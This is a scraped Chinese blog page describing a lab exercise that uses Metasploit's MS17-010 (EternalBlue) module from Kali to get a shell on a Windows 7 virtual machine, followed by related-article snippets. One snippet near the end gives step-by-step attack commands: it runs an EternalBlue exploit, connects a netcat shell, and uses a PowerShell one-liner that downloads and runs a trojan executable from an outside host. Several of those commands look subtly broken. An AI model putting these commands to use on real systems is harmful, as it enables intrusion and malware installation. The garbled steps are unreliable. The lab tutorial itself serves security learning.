kali利用MSF对ms17_010漏洞入侵win7

最新推荐文章于 2024-04-23 10:05:03 发布
最新推荐文章于 2024-04-23 10:05:03 发布
阅读量6.2k 收藏 52
点赞数 4
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57856283/article/details/121163395
版权

步骤一:实验环境的搭建

攻击机:kali(2021.1版本)
靶机:win7 旗舰版 sp1

在虚拟机里安装好上面两个环境后分别都打开(安装的步骤这里就不演示了,今天我们主要演示的是去入侵它)

打开安装好的环境

这边是我搭建好的kali环境 

下面是搭建好的win7环境

 这边注意的是攻击机和受害机都要让它在同一网段

接下来我们分别来看两个主机的ip地址

这个是win7的ip地址

这个是kali的ip地址

 我们可以看出两台主机实在同一个网段的,我们再来试试两台主机之间能否ping通

两台主机之间是可以互通,我们就可以去进行下一个步骤了 

 步骤二:开始针对win7的ms17_010进行渗透

我们使用的这本kali版本是自带msf工具的我们只需要直接打开它即可,在这里我介绍大家用命令去打开它。

我们只需要就终端里输入msfconsole即可

 开始使用入侵模块,进行入侵

调用永恒之蓝攻击模块

 

查看必要参数并且设置

 

设置相关参数,并确认必须参数都已经设置好

 

最后执行run入侵 

 以上就是入侵过程

当反弹出下面shell之后就说明我们入侵成功了

 

至此,我们拿到了目标靶机的最高权限,后面的大家就可以自己玩了,如果还有什么疑惑,欢迎留言评论或私信!也欢迎大家评论交流,大家有更好玩的也可以分享出来哦!

但是大家在自己的虚拟机里玩玩了解它的工作原理就可以了哦,千万不能去攻击别人的主机哦!

 

 

深渊山谷
关注
  • 4
    点赞
  • 52
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
kali入侵win7.txt
07-23
整合了网络众多教程,容易出错处写的较详细,便于新手测试学习。
Metasploit简单利用入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
如何使用kali入侵(渗透)一台windows
qq_53058639的博客
03-15 502
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
记录一次永恒之蓝(ms17-010漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 3468
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
使用MSF批量探测内网MS17-010漏洞
2301_77147728的博客
03-29 825
探测MS17-010可以先通过smb模块扫描出开放了445端口的主机,然后再使用MS17-010模块进行漏洞探测。这种方法适不仅适用于MS17-010漏洞的探测。如果默认没有链接的话可以先自己装一个postgresql数据库,然后新建一个名为msf的库,在msf中执行命令连接:db_connect postgres:[email protected]:5433/msf。首先启动数据库:service postgresql start。扫描完成后,扫描的信息会自动存入数据库,可通过hosts命令查看。
利用Kali Linux自带的MSF进行msf17-010漏洞模块(永恒之蓝漏洞)实现远程攻击
2301_79704866的博客
02-20 1646
利用MSF永恒之蓝漏洞远程攻击教程。
kali入侵win7(转载)
m0_56071898的博客
05-04 5462
前言: 本文的目的并不是教会学者入侵win7主机, 而是被入侵之后怎么反制并且做好下一步的防范 以及查到攻击者的蛛丝马迹 攻击原理: 利用未修复永恒之蓝的445端口漏洞入侵目标主机 演示设备: 主机 IP kali Linux 10.11.4.3 Windows7 10.11.4.152 (win7条件为无防火墙,无杀软) 攻击前准备: 扫描目标网段 扫描目标IP 使用msf工具的aux模块来测试目标是否能被正常攻击 1.1)--->扫描目标网段
kali利用ms17-010漏洞实现win7系统入侵
2301_77296801的博客
10-12 1386
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统。攻击者可以利用漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教学。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
ms17-017攻击XP
qq_43217550的博客
08-04 217
参数设置如下 采用的payload为:windows/x64/meterpreter/reverse_tcp) 运行成功后获取XP的控制权 保存至后台
【网络安全】通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
qq_68643282的博客
03-12 1924
通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
永恒之蓝(ms17-010)借助kali进行攻击win7实验报告
m0_65096687的博客
09-03 2594
永恒之蓝复现学习笔记
python实验一 使用KALI进行MS17_010渗透提权
04-09
华东交通大学网络安全软件开发python实验一
kali 渗透msf
11-14
kali渗透测试利器
Kali msf教程
08-24
kali linux msf系列教程
小程序前端调用接口(getAccessToken)获取调用凭据,调用接口(msgSecCheck)检测文本内容是否安全--最终版
qq_39951524的博客
04-22 449
小程序前端调用接口(getAccessToken)获取调用凭据,调用接口(msgSecCheck)检测文本你在前端测试时,最好使用**小程序工具的真机调试**,是可以跑通的,但你用**小程序工具的真机预览模式**就会没有响应。原因就在于访问**wx.request({})**,中的**服务器网址** ,需要在**小程序开发管理** 》》**开发设置** 》》 **服务器域名** 中配置,而小程序提供的接口**https://api.weixin.qq.com** ,又恰恰**不允许**在服务器域名中配置,
账号安全基本措施2
2301_78327423的博客
04-19 458
例如:配置zhangsan用户只能执行挂载命令,/usr/bin/mount /dev/sr0 /mnt/命令。在110行我们看到在这个组中,NOPASSWD:ALL,是要加入到wheel组中的,使用sudo执行任何命令不需要密码。第三列是开放的命令,比如:/usr/bin/mount /dev/sr0 /mnt/只能执行这一条命令。在/etc/sudoers.d/下写一个配置文件:vim /etc/sudoers.d/test。测试别名的使用,只有在/usr/bin/下的命令才可以无密码使用。
vue2 顶象 安全 验证码的使用
最新发布
lele66688888的博客
04-23 185
类似与这样的登录之前的验证 滑动一个盒子了 或者是 顺序点击文字了 等。
安全开发实战(4)--whois与子域名爆破
weixin_72543266的博客
04-18 884
安全开发实战(4)--whois与子域名爆破 Whois 查询是一种用于获取有关互联网域名注册信息的公共查询服务。当注册一个域名时,必须提供一些个人或组织信息,例如姓名、电子邮件地址、联系电话等。这些信息通常是公开的,可以通过 Whois 查询来获取。在渗透测试中,Whois 查询可以我们收集目标组织的关键信息。组织联系信息:包括名称、地址、电话号码和电子邮件地址。这些信息可以用于建立联系、进行社会工程攻击或者其他类型的攻击。域名到期日期:了解域名何时到期可以帮助我们预测目标可能面临的安全风险。
网站被SmartScreen标记为不安全怎么办?
Racent_Y的博客
04-22 533
在互联网时代,网站的安全性和可信度是用户选择是否继续访问的重要因素之一,然而,网站运营者偶尔会发现使用Edge浏览器访问网站时,会出现Microsoft Defender SmartScreen(以下简称SmartScreen)提示网站不安全的情况。旨在通过以上措施,尽可能的减少网站被SmartScreen标记为不安全的可能,让网站可以正常显示,从而使用户重新建立起对网站的信任,提高用户访问量和浏览量。这里的服务器证书指的就是可以实现网站HTTPS的SSL证书,且要使用在有效期内的。
kali利用ms17-010挂马
12-15
根据提供的引用内容,我们无法回答与网站挂马和文本输入相关的问题。关于kali利用ms17-010挂马的问题,我们需要先了解一下ms17-010是什么。ms17-010是指微软在2017年3月份发布的一个安全补丁,用于修复Windows操作系统中的SMBv1漏洞。攻击者可以利用漏洞远程执行代码,从而控制受感染的计算机。以下是kali利用ms17-010挂马的步骤: 1. 打开终端,输入以下命令更新kali系统: ```shell sudo apt-get update sudo apt-get upgrade ``` 2. 下载ms17-010漏洞利用工具,可以从GitHub上下载: ```shell git clone https://github.com/worawit/MS17-010.git ``` 3. 进入MS17-010目录,运行以下命令编译漏洞利用工具: ```shell cd MS17-010 make ``` 4. 执行以下命令,扫描目标主机是否存在SMBv1漏洞: ```shell ./send_and_execute 192.168.1.100 whoami.exe ``` 5. 如果目标主机存在SMBv1漏洞,执行以下命令,获取目标主机的Shell: ```shell ./eternalblue 192.168.1.100 shellcode.bin ``` 6. 执行以下命令,连接目标主机的Shell: ```shell nc 192.168.1.100 4444 ``` 7. 在目标主机的Shell中执行以下命令,下载并执行挂马程序: ```shell powershell -c "(new-object System.Net.WebClient).DownloadFile('http://www.trojan.com/1.exe','C:\Windows\Temp\1.exe');Start-Process 'C:\Windows\Temp\1.exe'" ``` 需要注意的是,上述步骤仅供学习和研究使用,请勿用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值